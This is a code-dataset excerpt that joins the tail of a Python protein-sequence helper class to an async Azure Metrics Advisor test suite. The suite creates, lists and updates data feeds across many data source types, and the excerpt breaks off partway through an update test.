
    def get_chain(self):
        return self.chain

    def get_residue(self, resnum):
        """
        Return the one-letter code at resnum.
        If region is given, resnum is residue number of PDB
        If not, resnum is Rosetta resnum
        """
        # Stray debug print() calls removed; they polluted stdout on
        # every lookup.
        if self.start:
            return self.sequence[resnum - self.start]
        return self.sequence[resnum - 1]

    def set_sequence(self, sequence):
        self.sequence = sequence

    def set_pdbID(self, pdbID):
        self.pdbID = pdbID

    def set_pdbpath(self, pdbpath):
        self.pdbpath = pdbpath

    def set_region(self, region):
        """Store a "start:end:chain" region string and parse its parts."""
        self.region = region
        parts = region.split(":")
        self.start = int(parts[0])
        self.end = int(parts[1])
        self.chain = parts[2]
| StarcoderdataPython |
194201 | # -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import datetime
from dateutil.tz import tzutc
import unittest
import pytest
from devtools_testutils import AzureTestCase
from azure.core.exceptions import ResourceNotFoundError
from azure.ai.metricsadvisor.models import (
SqlServerDataFeedSource,
AzureTableDataFeedSource,
AzureBlobDataFeedSource,
AzureCosmosDbDataFeedSource,
DataFeedMetric,
DataFeedDimension,
DataFeedSchema,
DataFeedIngestionSettings,
DataFeedGranularity,
DataFeedMissingDataPointFillSettings,
DataFeedRollupSettings,
AzureApplicationInsightsDataFeedSource,
AzureDataExplorerDataFeedSource,
InfluxDbDataFeedSource,
AzureDataLakeStorageGen2DataFeedSource,
MongoDbDataFeedSource,
MySqlDataFeedSource,
PostgreSqlDataFeedSource,
)
from base_testcase_async import TestMetricsAdvisorAdministrationClientBaseAsync
class TestMetricsAdvisorAdministrationClientAsync(TestMetricsAdvisorAdministrationClientBaseAsync):
@AzureTestCase.await_prepared_test
async def test_create_simple_data_feed(self):
data_feed_name = self.create_random_name("testfeed")
async with self.admin_client:
try:
data_feed = await self.admin_client.create_data_feed(
name=data_feed_name,
source=SqlServerDataFeedSource(
connection_string=self.sql_server_connection_string,
query="select * from adsample2 where Timestamp = @StartTime"
),
granularity="Daily",
schema=["cost", "revenue"],
ingestion_settings=datetime.datetime(2019, 10, 1)
)
self.assertIsNotNone(data_feed.id)
self.assertIsNotNone(data_feed.created_time)
self.assertIsNotNone(data_feed.name)
self.assertEqual(data_feed.source.data_source_type, "SqlServer")
self.assertIsNotNone(data_feed.source.query)
self.assertEqual(data_feed.granularity.granularity_type, "Daily")
self.assertEqual(data_feed.schema.metrics[0].name, "cost")
self.assertEqual(data_feed.schema.metrics[1].name, "revenue")
self.assertEqual(data_feed.ingestion_settings.ingestion_begin_time,
datetime.datetime(2019, 10, 1, tzinfo=tzutc()))
finally:
await self.admin_client.delete_data_feed(data_feed.id)
@AzureTestCase.await_prepared_test
async def test_create_data_feed_from_sql_server(self):
data_feed_name = self.create_random_name("testfeedasync")
async with self.admin_client:
try:
data_feed = await self.admin_client.create_data_feed(
name=data_feed_name,
source=SqlServerDataFeedSource(
connection_string=self.sql_server_connection_string,
query=u"select * from adsample2 where Timestamp = @StartTime"
),
granularity=DataFeedGranularity(
granularity_type="Daily",
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost", display_name="display cost", description="the cost"),
DataFeedMetric(name="revenue", display_name="display revenue", description="the revenue")
],
dimensions=[
DataFeedDimension(name="category", display_name="display category"),
DataFeedDimension(name="city", display_name="display city")
],
timestamp_column="Timestamp"
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2019, 10, 1),
data_source_request_concurrency=0,
ingestion_retry_delay=-1,
ingestion_start_offset=-1,
stop_retry_after=-1,
),
admin_emails=["<EMAIL>"],
data_feed_description="my first data feed",
missing_data_point_fill_settings=DataFeedMissingDataPointFillSettings(
fill_type="SmartFilling"
),
rollup_settings=DataFeedRollupSettings(
rollup_type="NoRollup",
rollup_method="None",
),
viewer_emails=["viewers"],
access_mode="Private",
action_link_template="action link template"
)
self.assertIsNotNone(data_feed.id)
self.assertIsNotNone(data_feed.created_time)
self.assertIsNotNone(data_feed.name)
self.assertEqual(data_feed.source.data_source_type, "SqlServer")
self.assertIsNotNone(data_feed.source.query)
self.assertEqual(data_feed.granularity.granularity_type, "Daily")
self.assertEqual(data_feed.granularity.custom_granularity_value, None)
self.assertEqual(data_feed.schema.metrics[0].name, "cost")
self.assertEqual(data_feed.schema.metrics[1].name, "revenue")
self.assertEqual(data_feed.schema.metrics[0].display_name, "display cost")
self.assertEqual(data_feed.schema.metrics[1].display_name, "display revenue")
self.assertEqual(data_feed.schema.metrics[0].description, "the cost")
self.assertEqual(data_feed.schema.metrics[1].description, "the revenue")
self.assertEqual(data_feed.schema.dimensions[0].name, "category")
self.assertEqual(data_feed.schema.dimensions[1].name, "city")
self.assertEqual(data_feed.schema.dimensions[0].display_name, "display category")
self.assertEqual(data_feed.schema.dimensions[1].display_name, "display city")
self.assertEqual(data_feed.ingestion_settings.ingestion_begin_time,
datetime.datetime(2019, 10, 1, tzinfo=tzutc()))
self.assertEqual(data_feed.ingestion_settings.data_source_request_concurrency, 0)
self.assertEqual(data_feed.ingestion_settings.ingestion_retry_delay, -1)
self.assertEqual(data_feed.ingestion_settings.ingestion_start_offset, -1)
self.assertEqual(data_feed.ingestion_settings.stop_retry_after, -1)
self.assertIn("<EMAIL>", data_feed.admin_emails)
self.assertEqual(data_feed.data_feed_description, "my first data feed")
self.assertEqual(data_feed.missing_data_point_fill_settings.fill_type, "SmartFilling")
self.assertEqual(data_feed.rollup_settings.rollup_type, "NoRollup")
self.assertEqual(data_feed.rollup_settings.rollup_method, "None")
self.assertEqual(data_feed.viewer_emails, ["viewers"])
self.assertEqual(data_feed.access_mode, "Private")
self.assertEqual(data_feed.action_link_template, "action link template")
self.assertEqual(data_feed.status, "Active")
self.assertTrue(data_feed.is_admin)
self.assertIsNotNone(data_feed.metric_ids)
finally:
await self.admin_client.delete_data_feed(data_feed.id)
with self.assertRaises(ResourceNotFoundError):
await self.admin_client.get_data_feed(data_feed.id)
@AzureTestCase.await_prepared_test
async def test_create_data_feed_from_sql_server_with_custom_values(self):
data_feed_name = self.create_random_name("testfeedasync")
async with self.admin_client:
try:
data_feed = await self.admin_client.create_data_feed(
name=data_feed_name,
source=SqlServerDataFeedSource(
connection_string=self.sql_server_connection_string,
query=u"select * from adsample2 where Timestamp = @StartTime"
),
granularity=DataFeedGranularity(
granularity_type="Custom",
custom_granularity_value=20
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost", display_name="display cost", description="the cost"),
DataFeedMetric(name="revenue", display_name="display revenue", description="the revenue")
],
dimensions=[
DataFeedDimension(name="category", display_name="display category"),
DataFeedDimension(name="city", display_name="display city")
],
timestamp_column="Timestamp"
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2019, 10, 1),
data_source_request_concurrency=0,
ingestion_retry_delay=-1,
ingestion_start_offset=-1,
stop_retry_after=-1,
),
admin_emails=["<EMAIL>"],
data_feed_description="my first data feed",
missing_data_point_fill_settings=DataFeedMissingDataPointFillSettings(
fill_type="CustomValue",
custom_fill_value=10
),
rollup_settings=DataFeedRollupSettings(
rollup_type="AlreadyRollup",
rollup_method="Sum",
rollup_identification_value="sumrollup"
),
viewer_emails=["viewers"],
access_mode="Private",
action_link_template="action link template"
)
self.assertIsNotNone(data_feed.id)
self.assertIsNotNone(data_feed.created_time)
self.assertIsNotNone(data_feed.name)
self.assertEqual(data_feed.source.data_source_type, "SqlServer")
self.assertIsNotNone(data_feed.source.query)
self.assertEqual(data_feed.granularity.granularity_type, "Custom")
self.assertEqual(data_feed.granularity.custom_granularity_value, 20)
self.assertEqual(data_feed.schema.metrics[0].name, "cost")
self.assertEqual(data_feed.schema.metrics[1].name, "revenue")
self.assertEqual(data_feed.schema.metrics[0].display_name, "display cost")
self.assertEqual(data_feed.schema.metrics[1].display_name, "display revenue")
self.assertEqual(data_feed.schema.metrics[0].description, "the cost")
self.assertEqual(data_feed.schema.metrics[1].description, "the revenue")
self.assertEqual(data_feed.schema.dimensions[0].name, "category")
self.assertEqual(data_feed.schema.dimensions[1].name, "city")
self.assertEqual(data_feed.schema.dimensions[0].display_name, "display category")
self.assertEqual(data_feed.schema.dimensions[1].display_name, "display city")
self.assertEqual(data_feed.ingestion_settings.ingestion_begin_time,
datetime.datetime(2019, 10, 1, tzinfo=tzutc()))
self.assertEqual(data_feed.ingestion_settings.data_source_request_concurrency, 0)
self.assertEqual(data_feed.ingestion_settings.ingestion_retry_delay, -1)
self.assertEqual(data_feed.ingestion_settings.ingestion_start_offset, -1)
self.assertEqual(data_feed.ingestion_settings.stop_retry_after, -1)
self.assertIn("<EMAIL>", data_feed.admin_emails)
self.assertEqual(data_feed.data_feed_description, "my first data feed")
self.assertEqual(data_feed.missing_data_point_fill_settings.fill_type, "CustomValue")
self.assertEqual(data_feed.missing_data_point_fill_settings.custom_fill_value, 10)
self.assertEqual(data_feed.rollup_settings.rollup_type, "AlreadyRollup")
self.assertEqual(data_feed.rollup_settings.rollup_method, "Sum")
self.assertEqual(data_feed.rollup_settings.rollup_identification_value, "sumrollup")
self.assertEqual(data_feed.viewer_emails, ["viewers"])
self.assertEqual(data_feed.access_mode, "Private")
self.assertEqual(data_feed.action_link_template, "action link template")
self.assertEqual(data_feed.status, "Active")
self.assertTrue(data_feed.is_admin)
self.assertIsNotNone(data_feed.metric_ids)
finally:
await self.admin_client.delete_data_feed(data_feed.id)
with self.assertRaises(ResourceNotFoundError):
await self.admin_client.get_data_feed(data_feed.id)
@AzureTestCase.await_prepared_test
async def test_create_data_feed_with_azure_table(self):
name = self.create_random_name("tablefeedasync")
async with self.admin_client:
try:
data_feed = await self.admin_client.create_data_feed(
name=name,
source=AzureTableDataFeedSource(
connection_string=self.azure_table_connection_string,
query="PartitionKey ge '@StartTime' and PartitionKey lt '@EndTime'",
table="adsample"
),
granularity=DataFeedGranularity(
granularity_type="Daily",
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost"),
DataFeedMetric(name="revenue")
],
dimensions=[
DataFeedDimension(name="category"),
DataFeedDimension(name="city")
],
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2019, 10, 1),
),
)
self.assertIsNotNone(data_feed.id)
self.assertIsNotNone(data_feed.created_time)
self.assertIsNotNone(data_feed.name)
self.assertEqual(data_feed.source.data_source_type, "AzureTable")
self.assertEqual(data_feed.source.table, "adsample")
self.assertEqual(data_feed.source.query, "PartitionKey ge '@StartTime' and PartitionKey lt '@EndTime'")
finally:
await self.admin_client.delete_data_feed(data_feed.id)
@AzureTestCase.await_prepared_test
async def test_create_data_feed_with_azure_blob(self):
name = self.create_random_name("blobfeedasync")
async with self.admin_client:
try:
data_feed = await self.admin_client.create_data_feed(
name=name,
source=AzureBlobDataFeedSource(
connection_string=self.azure_blob_connection_string,
container="adsample",
blob_template="%Y/%m/%d/%h/JsonFormatV2.json"
),
granularity=DataFeedGranularity(
granularity_type="Daily",
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost"),
DataFeedMetric(name="revenue")
],
dimensions=[
DataFeedDimension(name="category"),
DataFeedDimension(name="city")
],
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2019, 10, 1),
),
)
self.assertIsNotNone(data_feed.id)
self.assertIsNotNone(data_feed.created_time)
self.assertIsNotNone(data_feed.name)
self.assertEqual(data_feed.source.data_source_type, "AzureBlob")
self.assertEqual(data_feed.source.container, "adsample")
self.assertEqual(data_feed.source.blob_template, "%Y/%m/%d/%h/JsonFormatV2.json")
finally:
await self.admin_client.delete_data_feed(data_feed.id)
@AzureTestCase.await_prepared_test
async def test_create_data_feed_with_azure_cosmos_db(self):
name = self.create_random_name("cosmosfeedasync")
async with self.admin_client:
try:
data_feed = await self.admin_client.create_data_feed(
name=name,
source=AzureCosmosDbDataFeedSource(
connection_string=self.azure_cosmosdb_connection_string,
sql_query="'SELECT * FROM Items I where I.Timestamp >= @StartTime and I.Timestamp < @EndTime'",
database="adsample",
collection_id="adsample"
),
granularity=DataFeedGranularity(
granularity_type="Daily",
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost"),
DataFeedMetric(name="revenue")
],
dimensions=[
DataFeedDimension(name="category"),
DataFeedDimension(name="city")
],
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2019, 10, 1),
),
)
self.assertIsNotNone(data_feed.id)
self.assertIsNotNone(data_feed.created_time)
self.assertIsNotNone(data_feed.name)
self.assertEqual(data_feed.source.data_source_type, "AzureCosmosDB")
self.assertEqual(data_feed.source.database, "adsample")
self.assertEqual(data_feed.source.collection_id, "adsample")
self.assertEqual(data_feed.source.sql_query, "'SELECT * FROM Items I where I.Timestamp >= @StartTime and I.Timestamp < @EndTime'")
finally:
await self.admin_client.delete_data_feed(data_feed.id)
@AzureTestCase.await_prepared_test
async def test_create_data_feed_with_application_insights(self):
name = self.create_random_name("applicationinsightsasync")
async with self.admin_client:
try:
query = "let gran=60m; let starttime=datetime(@StartTime); let endtime=starttime + gran; requests | " \
"where timestamp >= starttime and timestamp < endtime | summarize request_count = count(), " \
"duration_avg_ms = avg(duration), duration_95th_ms = percentile(duration, 95), " \
"duration_max_ms = max(duration) by resultCode"
data_feed = await self.admin_client.create_data_feed(
name=name,
source=AzureApplicationInsightsDataFeedSource(
azure_cloud="Azure",
application_id="3706fe8b-98f1-47c7-bf69-b73b6e53274d",
api_key=self.application_insights_api_key,
query=query
),
granularity=DataFeedGranularity(
granularity_type="Daily",
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost"),
DataFeedMetric(name="revenue")
],
dimensions=[
DataFeedDimension(name="category"),
DataFeedDimension(name="city")
],
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2020, 7, 1),
),
)
self.assertIsNotNone(data_feed.id)
self.assertIsNotNone(data_feed.created_time)
self.assertIsNotNone(data_feed.name)
self.assertEqual(data_feed.source.data_source_type, "AzureApplicationInsights")
self.assertEqual(data_feed.source.application_id, "3706fe8b-98f1-47c7-bf69-b73b6e53274d")
self.assertIsNotNone(data_feed.source.query)
finally:
await self.admin_client.delete_data_feed(data_feed.id)
@AzureTestCase.await_prepared_test
async def test_create_data_feed_with_data_explorer(self):
name = self.create_random_name("azuredataexplorerasync")
async with self.admin_client:
try:
query = "let StartDateTime = datetime(@StartTime); let EndDateTime = StartDateTime + 1d; " \
"adsample | where Timestamp >= StartDateTime and Timestamp < EndDateTime"
data_feed = await self.admin_client.create_data_feed(
name=name,
source=AzureDataExplorerDataFeedSource(
connection_string=self.azure_data_explorer_connection_string,
query=query
),
granularity=DataFeedGranularity(
granularity_type="Daily",
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost"),
DataFeedMetric(name="revenue")
],
dimensions=[
DataFeedDimension(name="category"),
DataFeedDimension(name="city")
],
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2019, 1, 1),
),
)
self.assertIsNotNone(data_feed.id)
self.assertIsNotNone(data_feed.created_time)
self.assertIsNotNone(data_feed.name)
self.assertEqual(data_feed.source.data_source_type, "AzureDataExplorer")
self.assertEqual(data_feed.source.query, query)
finally:
await self.admin_client.delete_data_feed(data_feed.id)
@AzureTestCase.await_prepared_test
async def test_create_data_feed_with_influxdb(self):
name = self.create_random_name("influxdbasync")
async with self.admin_client:
try:
data_feed = await self.admin_client.create_data_feed(
name=name,
source=InfluxDbDataFeedSource(
connection_string=self.influxdb_connection_string,
database="adsample",
user_name="adreadonly",
password=self.influxdb_password,
query="'select * from adsample2 where Timestamp = @StartTime'"
),
granularity=DataFeedGranularity(
granularity_type="Daily",
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost"),
DataFeedMetric(name="revenue")
],
dimensions=[
DataFeedDimension(name="category"),
DataFeedDimension(name="city")
],
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2019, 1, 1),
),
)
self.assertIsNotNone(data_feed.id)
self.assertIsNotNone(data_feed.created_time)
self.assertIsNotNone(data_feed.name)
self.assertEqual(data_feed.source.data_source_type, "InfluxDB")
self.assertIsNotNone(data_feed.source.query)
self.assertEqual(data_feed.source.database, "adsample")
self.assertEqual(data_feed.source.user_name, "adreadonly")
finally:
await self.admin_client.delete_data_feed(data_feed.id)
@AzureTestCase.await_prepared_test
async def test_create_data_feed_with_datalake(self):
name = self.create_random_name("datalakeasync")
async with self.admin_client:
try:
data_feed = await self.admin_client.create_data_feed(
name=name,
source=AzureDataLakeStorageGen2DataFeedSource(
account_name="adsampledatalakegen2",
account_key=self.azure_datalake_account_key,
file_system_name="adsample",
directory_template="%Y/%m/%d",
file_template="adsample.json"
),
granularity=DataFeedGranularity(
granularity_type="Daily",
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost", display_name="Cost"),
DataFeedMetric(name="revenue", display_name="Revenue")
],
dimensions=[
DataFeedDimension(name="category", display_name="Category"),
DataFeedDimension(name="city", display_name="City")
],
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2019, 1, 1),
),
)
self.assertIsNotNone(data_feed.id)
self.assertIsNotNone(data_feed.created_time)
self.assertIsNotNone(data_feed.name)
self.assertEqual(data_feed.source.data_source_type, "AzureDataLakeStorageGen2")
self.assertEqual(data_feed.source.account_name, "adsampledatalakegen2")
self.assertEqual(data_feed.source.file_system_name, "adsample")
self.assertEqual(data_feed.source.directory_template, "%Y/%m/%d")
self.assertEqual(data_feed.source.file_template, "adsample.json")
finally:
await self.admin_client.delete_data_feed(data_feed.id)
@AzureTestCase.await_prepared_test
async def test_create_data_feed_with_mongodb(self):
name = self.create_random_name("mongodbasync")
async with self.admin_client:
try:
data_feed = await self.admin_client.create_data_feed(
name=name,
source=MongoDbDataFeedSource(
connection_string=self.mongodb_connection_string,
database="adsample",
command='{"find": "adsample", "filter": { Timestamp: { $eq: @StartTime }} "batchSize": 2000,}'
),
granularity=DataFeedGranularity(
granularity_type="Daily",
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost"),
DataFeedMetric(name="revenue")
],
dimensions=[
DataFeedDimension(name="category"),
DataFeedDimension(name="city")
],
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2019, 1, 1),
),
)
self.assertIsNotNone(data_feed.id)
self.assertIsNotNone(data_feed.created_time)
self.assertIsNotNone(data_feed.name)
self.assertEqual(data_feed.source.data_source_type, "MongoDB")
self.assertEqual(data_feed.source.database, "adsample")
self.assertEqual(data_feed.source.command, '{"find": "adsample", "filter": { Timestamp: { $eq: @StartTime }} "batchSize": 2000,}')
finally:
await self.admin_client.delete_data_feed(data_feed.id)
@AzureTestCase.await_prepared_test
async def test_create_data_feed_with_mysql(self):
name = self.create_random_name("mysqlasync")
async with self.admin_client:
try:
data_feed = await self.admin_client.create_data_feed(
name=name,
source=MySqlDataFeedSource(
connection_string=self.mysql_connection_string,
query="'select * from adsample2 where Timestamp = @StartTime'"
),
granularity=DataFeedGranularity(
granularity_type="Daily",
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost"),
DataFeedMetric(name="revenue")
],
dimensions=[
DataFeedDimension(name="category"),
DataFeedDimension(name="city")
],
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2019, 1, 1),
),
)
self.assertIsNotNone(data_feed.id)
self.assertIsNotNone(data_feed.created_time)
self.assertIsNotNone(data_feed.name)
self.assertEqual(data_feed.source.data_source_type, "MySql")
self.assertEqual(data_feed.source.query, "'select * from adsample2 where Timestamp = @StartTime'")
finally:
await self.admin_client.delete_data_feed(data_feed.id)
@AzureTestCase.await_prepared_test
async def test_create_data_feed_with_postgresql(self):
name = self.create_random_name("postgresqlasync")
async with self.admin_client:
try:
data_feed = await self.admin_client.create_data_feed(
name=name,
source=PostgreSqlDataFeedSource(
connection_string=self.postgresql_connection_string,
query="'select * from adsample2 where Timestamp = @StartTime'"
),
granularity=DataFeedGranularity(
granularity_type="Daily",
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost"),
DataFeedMetric(name="revenue")
],
dimensions=[
DataFeedDimension(name="category"),
DataFeedDimension(name="city")
],
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2019, 1, 1),
),
)
self.assertIsNotNone(data_feed.id)
self.assertIsNotNone(data_feed.created_time)
self.assertIsNotNone(data_feed.name)
self.assertEqual(data_feed.source.data_source_type, "PostgreSql")
self.assertEqual(data_feed.source.query, "'select * from adsample2 where Timestamp = @StartTime'")
finally:
await self.admin_client.delete_data_feed(data_feed.id)
@AzureTestCase.await_prepared_test
async def test_list_data_feeds(self):
async with self.admin_client:
feeds = self.admin_client.list_data_feeds()
feeds_list = []
async for item in feeds:
feeds_list.append(item)
assert len(feeds_list) > 0
@AzureTestCase.await_prepared_test
async def test_list_data_feeds_with_data_feed_name(self):
async with self.admin_client:
feeds = self.admin_client.list_data_feeds(data_feed_name="azsqlDatafeed")
feeds_list = []
async for item in feeds:
feeds_list.append(item)
assert len(feeds_list) == 1
@AzureTestCase.await_prepared_test
async def test_list_data_feeds_with_status(self):
async with self.admin_client:
feeds = self.admin_client.list_data_feeds(status="Paused")
feeds_list = []
async for item in feeds:
feeds_list.append(item)
assert len(feeds_list) == 0
@AzureTestCase.await_prepared_test
async def test_list_data_feeds_with_source_type(self):
    """Filtering by SqlServer source type returns at least one feed."""
    async with self.admin_client:
        sql_feeds = [feed async for feed in
                     self.admin_client.list_data_feeds(data_source_type="SqlServer")]
        assert len(sql_feeds) > 0
@AzureTestCase.await_prepared_test
async def test_list_data_feeds_with_granularity_type(self):
    """Filtering by 'Daily' granularity returns at least one feed."""
    async with self.admin_client:
        daily_feeds = [feed async for feed in
                       self.admin_client.list_data_feeds(granularity_type="Daily")]
        assert len(daily_feeds) > 0
@unittest.skip("skip test")
@AzureTestCase.await_prepared_test
async def test_list_data_feeds_with_skip(self):
    """Skipping one feed yields exactly one fewer result than a full listing."""
    async with self.admin_client:
        everything = [feed async for feed in self.admin_client.list_data_feeds()]
        after_skip = [feed async for feed in self.admin_client.list_data_feeds(skip=1)]
        assert len(everything) == len(after_skip) + 1
@AzureTestCase.await_prepared_test
async def test_update_data_feed_with_model(self):
    """Update every mutable data feed property through a model instance.

    Creates a throw-away feed, mutates the returned model in place, sends it
    via update_data_feed, then re-fetches the feed and verifies the service
    persisted each change.  The feed is deleted in ``finally``.
    """
    async with self.admin_client:
        data_feed = await self._create_data_feed_for_update("update")
        try:
            # Mutate every updatable field on the model.
            data_feed.name = "update"
            data_feed.data_feed_description = "updated"
            data_feed.schema.timestamp_column = "time"
            data_feed.ingestion_settings.ingestion_begin_time = datetime.datetime(2020, 12, 10)
            data_feed.ingestion_settings.ingestion_start_offset = 1
            data_feed.ingestion_settings.data_source_request_concurrency = 1
            data_feed.ingestion_settings.ingestion_retry_delay = 1
            data_feed.ingestion_settings.stop_retry_after = 1
            data_feed.rollup_settings.rollup_type = "AlreadyRollup"
            data_feed.rollup_settings.rollup_method = "Sum"
            data_feed.rollup_settings.rollup_identification_value = "sumrollup"
            data_feed.rollup_settings.auto_rollup_group_by_column_names = []
            data_feed.missing_data_point_fill_settings.fill_type = "CustomValue"
            data_feed.missing_data_point_fill_settings.custom_fill_value = 2
            data_feed.access_mode = "Public"
            data_feed.viewer_emails = ["updated"]
            data_feed.status = "Paused"
            data_feed.action_link_template = "updated"
            data_feed.source.connection_string = "updated"
            data_feed.source.query = "get data"
            await self.admin_client.update_data_feed(data_feed)
            # Re-fetch and verify each mutation round-tripped.
            updated = await self.admin_client.get_data_feed(data_feed.id)
            self.assertEqual(updated.name, "update")
            self.assertEqual(updated.data_feed_description, "updated")
            self.assertEqual(updated.schema.timestamp_column, "time")
            # The service normalizes the ingestion begin time to UTC.
            self.assertEqual(updated.ingestion_settings.ingestion_begin_time,
                             datetime.datetime(2020, 12, 10, tzinfo=tzutc()))
            self.assertEqual(updated.ingestion_settings.ingestion_start_offset, 1)
            self.assertEqual(updated.ingestion_settings.data_source_request_concurrency, 1)
            self.assertEqual(updated.ingestion_settings.ingestion_retry_delay, 1)
            self.assertEqual(updated.ingestion_settings.stop_retry_after, 1)
            self.assertEqual(updated.rollup_settings.rollup_type, "AlreadyRollup")
            self.assertEqual(updated.rollup_settings.rollup_method, "Sum")
            self.assertEqual(updated.rollup_settings.rollup_identification_value, "sumrollup")
            self.assertEqual(updated.missing_data_point_fill_settings.fill_type, "CustomValue")
            self.assertEqual(updated.missing_data_point_fill_settings.custom_fill_value, 2)
            self.assertEqual(updated.access_mode, "Public")
            self.assertEqual(updated.viewer_emails, ["updated"])
            self.assertEqual(updated.status, "Paused")
            self.assertEqual(updated.action_link_template, "updated")
            self.assertEqual(updated.source.query, "get data")
        finally:
            await self.admin_client.delete_data_feed(data_feed.id)
@AzureTestCase.await_prepared_test
async def test_update_data_feed_with_kwargs(self):
    """Update every mutable data feed property using keyword arguments only.

    Same coverage as test_update_data_feed_with_model, but passes the feed id
    plus individual keyword arguments instead of a mutated model instance.
    """
    async with self.admin_client:
        data_feed = await self._create_data_feed_for_update("update")
        try:
            await self.admin_client.update_data_feed(
                data_feed.id,
                name="update",
                data_feed_description="updated",
                timestamp_column="time",
                ingestion_begin_time=datetime.datetime(2020, 12, 10),
                ingestion_start_offset=1,
                data_source_request_concurrency=1,
                ingestion_retry_delay=1,
                stop_retry_after=1,
                rollup_type="AlreadyRollup",
                rollup_method="Sum",
                rollup_identification_value="sumrollup",
                auto_rollup_group_by_column_names=[],
                fill_type="CustomValue",
                custom_fill_value=2,
                access_mode="Public",
                viewer_emails=["updated"],
                status="Paused",
                action_link_template="updated",
                source=SqlServerDataFeedSource(
                    connection_string="updated",
                    query="get data"
                )
            )
            # Re-fetch and verify each keyword argument was applied.
            updated = await self.admin_client.get_data_feed(data_feed.id)
            self.assertEqual(updated.name, "update")
            self.assertEqual(updated.data_feed_description, "updated")
            self.assertEqual(updated.schema.timestamp_column, "time")
            # The service normalizes the ingestion begin time to UTC.
            self.assertEqual(updated.ingestion_settings.ingestion_begin_time,
                             datetime.datetime(2020, 12, 10, tzinfo=tzutc()))
            self.assertEqual(updated.ingestion_settings.ingestion_start_offset, 1)
            self.assertEqual(updated.ingestion_settings.data_source_request_concurrency, 1)
            self.assertEqual(updated.ingestion_settings.ingestion_retry_delay, 1)
            self.assertEqual(updated.ingestion_settings.stop_retry_after, 1)
            self.assertEqual(updated.rollup_settings.rollup_type, "AlreadyRollup")
            self.assertEqual(updated.rollup_settings.rollup_method, "Sum")
            self.assertEqual(updated.rollup_settings.rollup_identification_value, "sumrollup")
            self.assertEqual(updated.missing_data_point_fill_settings.fill_type, "CustomValue")
            self.assertEqual(updated.missing_data_point_fill_settings.custom_fill_value, 2)
            self.assertEqual(updated.access_mode, "Public")
            self.assertEqual(updated.viewer_emails, ["updated"])
            self.assertEqual(updated.status, "Paused")
            self.assertEqual(updated.action_link_template, "updated")
            self.assertEqual(updated.source.query, "get data")
        finally:
            await self.admin_client.delete_data_feed(data_feed.id)
@AzureTestCase.await_prepared_test
async def test_update_data_feed_with_model_and_kwargs(self):
    """Verify precedence when a model and keyword arguments are both passed.

    The model carries "don't update me" sentinels for the fields also given
    as keyword arguments; the assertions below show the kwargs win for those
    fields, while model-only changes (name, description) are preserved.
    """
    async with self.admin_client:
        data_feed = await self._create_data_feed_for_update("update")
        try:
            # Model values: only name/description should survive; the rest
            # are sentinels expected to be overridden by the kwargs below.
            data_feed.name = "updateMe"
            data_feed.data_feed_description = "updateMe"
            data_feed.schema.timestamp_column = "don't update me"
            data_feed.ingestion_settings.ingestion_begin_time = datetime.datetime(2020, 12, 22)
            data_feed.ingestion_settings.ingestion_start_offset = 2
            data_feed.ingestion_settings.data_source_request_concurrency = 2
            data_feed.ingestion_settings.ingestion_retry_delay = 2
            data_feed.ingestion_settings.stop_retry_after = 2
            data_feed.rollup_settings.rollup_type = "don't update me"
            data_feed.rollup_settings.rollup_method = "don't update me"
            data_feed.rollup_settings.rollup_identification_value = "don't update me"
            data_feed.rollup_settings.auto_rollup_group_by_column_names = []
            data_feed.missing_data_point_fill_settings.fill_type = "don't update me"
            data_feed.missing_data_point_fill_settings.custom_fill_value = 4
            data_feed.access_mode = "don't update me"
            data_feed.viewer_emails = ["don't update me"]
            data_feed.status = "don't update me"
            data_feed.action_link_template = "don't update me"
            data_feed.source.connection_string = "don't update me"
            data_feed.source.query = "don't update me"
            await self.admin_client.update_data_feed(
                data_feed,
                timestamp_column="time",
                ingestion_begin_time=datetime.datetime(2020, 12, 10),
                ingestion_start_offset=1,
                data_source_request_concurrency=1,
                ingestion_retry_delay=1,
                stop_retry_after=1,
                rollup_type="AlreadyRollup",
                rollup_method="Sum",
                rollup_identification_value="sumrollup",
                auto_rollup_group_by_column_names=[],
                fill_type="CustomValue",
                custom_fill_value=2,
                access_mode="Public",
                viewer_emails=["updated"],
                status="Paused",
                action_link_template="updated",
                source=SqlServerDataFeedSource(
                    connection_string="updated",
                    query="get data"
                )
            )
            updated = await self.admin_client.get_data_feed(data_feed.id)
            # Model-only fields kept their model values...
            self.assertEqual(updated.name, "updateMe")
            self.assertEqual(updated.data_feed_description, "updateMe")
            # ...while kwargs overrode the sentinel model values.
            self.assertEqual(updated.schema.timestamp_column, "time")
            self.assertEqual(updated.ingestion_settings.ingestion_begin_time,
                             datetime.datetime(2020, 12, 10, tzinfo=tzutc()))
            self.assertEqual(updated.ingestion_settings.ingestion_start_offset, 1)
